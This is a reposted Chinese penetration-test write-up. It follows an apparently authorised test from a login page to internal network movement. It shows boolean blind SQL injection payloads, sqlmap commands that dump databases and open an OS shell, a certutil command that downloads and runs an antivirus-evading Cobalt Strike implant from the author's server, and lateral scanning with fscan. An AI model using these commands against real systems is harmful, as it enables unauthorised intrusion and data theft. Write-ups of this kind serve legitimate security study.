服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

实战 | 记一次从登录框到内网横向

日期: 来源:潇湘信安收集编辑:星海安全实验室
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


现在只对常读和星标的公众号才展示大图推送,建议大家能把潇湘信安“设为星标”,否则可能看不到了...!


0x00 前言

接到公司通知要对某某行业做渗透测试,挖一些尽可能高危的漏洞,于是便有了接下来的故事。

0x01 信息收集

首先收集了十几个该行业相关的网站,然后一个个做信息收集,先列出来可利用的点。
某某公司为YouDianCMS(可能存在注入)。某集团OA,使用的是通达OA。某管理系统,存在登录框,无验证码。某监控管理系统,存在登录框,无验证码。某收费系统,使用的是若依管理系统。

0x02 漏洞利用

1. 通达OA

习惯性先试一下通达OA,通达OA的利用工具比较方便,若存在漏洞可以一键getshell,不过利用失败了。


2. 测试YouDianCMS

之前收集的youdianCMS的sql注入的POC,直接利用,但是还是不存在该漏洞。


3. 测试若依管理系统

1)测试默认口令:admin/admin123,失败。


2)测试shiro反序列化漏洞。


均失败了。

4. 测试某管理系统

爆破密码。爆出来了弱口令admin/456123,但是登录进去后找了一圈没有geshell的点,一个弱口令肯定没法交差。


5. 测试某监控管理系统的登录框


最后一个点了,再不行要重新打点了,本来也没报什么希望,登录框做渗透测试几乎没挖到过什么大的漏洞。

首先测试弱口令,爆破了一圈没有弱口令,扫目录也没扫出什么东西,JS代码里也没泄露有用的信息,突然想到还没试注入,这一试,果然有问题。


当参数loginName的值后边修改为 and'q'='q" 时,页面返回密码错误,修改为 and'u'='k" 时,页面返回用户不存在,说明页面存在布尔盲注。

sqlmap一把梭:
sqlmap.py -r 1.txt --dbs --random-agent --proxy=http://127.0.0.1:7890


跑出来了数据库,但是跑表的时候出错了,不知道为什么跑不出来。

直接获取shell试试:
sqlmap.py -r 1.txt --os-shell --random-agent --proxy=http://127.0.0.1:7890


可以执行命令,但是回显的巨慢。

本来想着已经成功了,接下来的拿shell就水到渠成,没想到又曲折了一番。

CS直接生成powershell命令,然后令目标系统执行,执行完毕一直没上线,然后想着让sqlmap回显一下看看有什么问题,等了十几分钟页面才回显完,应该是有杀软,页面返回的是“检测到该命令为危险命令”,就给拦截了。


直接生成exe肯定也不行,这时候就要让大佬帮忙了。

免杀马到手,Windows通过certutil命令进行远程下载。先把免杀马上传到VPS上,然后开一个http服务。然后在shell中执行:
certutil -urlcache -split -f http://xx.xx.xx.xx/cs.exe dll.exe

然后直接通过命令运行:
dll.exe

这回想着肯定能成功,结果等了半天还是没反应,一脸懵逼,看了下VPS,有下载记录呀。


难道被杀了?
想执行一下 dir 看看目录下有没有该文件,但是目录下有几百个文件,要等全部都回显要等半小时。

最后想了想是不是该目录下没有权限,于是在目标系统的D盘新建一个dll文件夹,然后把免杀马写到这里。

certutil -urlcache -split -f http://xx.xx.xx.xx/cs.exe d:\dll\dll.exe

然后执行:
d:\dll\dll.exe

终于成功上线。


0x03 横向攻击

看一下目标机器有哪些敏感文件可利用,收获颇丰呀。


fscan横向一波,发现了几个站点,但是没有扫到能直接利用的漏洞。


由于领导说的只是让挖到漏洞,所以要问下领导能否进行横向攻击,先点到为止。

0x04 总结

之前做渗透每次遇到登录框都比较头疼,因为登录框可利用的点比较少,也没在登录框上挖到过什么大的漏洞,但是本次运气还是比较好的,总算可以交差了。

文章转载自公众号:星海安全实验室



关 注 有 礼



关注公众号回复“9527”可以领取一套HTB靶场文档和视频,“1208”个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“2191”潇湘信安文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。
 还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读





相关阅读

  • 速递 | 关于2023年创新学分冲抵课程学分的通知

  • 关于2023年创新学分冲抵课程学分的通知各有关单位:为落实创新学分冲抵选修课程学分,规范学分冲抵程序和流程,根据《武汉大学创新学分认定办法的通知》(武大本字〔2019〕29号)要求
  • 安全威胁情报周报(1.30~2.5)

  • 一周威胁情报摘要金融威胁情报新的恶意软件 HeadCrab 感染 Redis 服务器挖掘加密货币政府威胁情报拉脱维亚国防部疑似遭到俄罗斯威胁组织 Gamaredon 的钓鱼攻击能源威胁情报
  • 安全威胁情报周报(2.6~2.12)

  • 一周威胁情报摘要金融威胁情报新的银行木马 PixPirate 瞄准巴西金融机构政府威胁情报伊朗威胁组织 APT34 使用新后门 MrPerfectInstaller 瞄准中东地区政府机构,展开攻击能源
  • 安全威胁情报周报(2.20~2.26)

  • 一周威胁情报摘要金融威胁情报加密货币交易所 Coinbase 遭到黑客攻击政府威胁情报SideCopy APT 组织瞄准印度政府展开攻击能源威胁情报葡萄牙供水公司 Aguas do Porto 遭勒
  • 安全威胁情报周报(2.13~2.19)

  • 一周威胁情报摘要金融威胁情报Enigma Stealer 以虚假就业为诱饵瞄准加密货币行业政府威胁情报英国国会议员电子邮件疑似遭到俄罗斯黑客入侵工控威胁情报Korenix JetWave工业
  • 修复方案|泛微e-cology9 SQL注入高危漏洞

  • 01 漏洞概况 近日,微步在线通过“X漏洞奖励计划”获取到泛微e-cology9协同办公系统SQL注入漏洞的0day相关漏洞情报,攻击者可以通过利用构造恶意数据包进行SQL注入,获取数据库敏
  • 开始测试一天能赚几万的半无人直播项目

  • 作者 l 圣矾来源 l 圣矾思维说(ID:shengfanwz7)“让所有认可我的人都学会独立思考赚钱的能力是我一生的责任”公众号内回复往期内容查看以前的文章请牢记下面这个赚钱公式:利润=
  • 查看学生的测试详情

  • 查看学生的测试详情本账号提供BB教学平台各类应用案例和技巧、分享教育教学应用软件和使用技巧。BUCM数字化教学与服务长按识别二维码,关注微信号

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 实战 | 记一次从登录框到内网横向

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • GitHub监控和信息收集工具

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • Go语言内网资产探测工具

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • 实战 | 记一次某小网站的渗透过程

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • 记一次bypass前端验证+后端缺陷

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • MSSQL弱口令绕过某数字上线

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试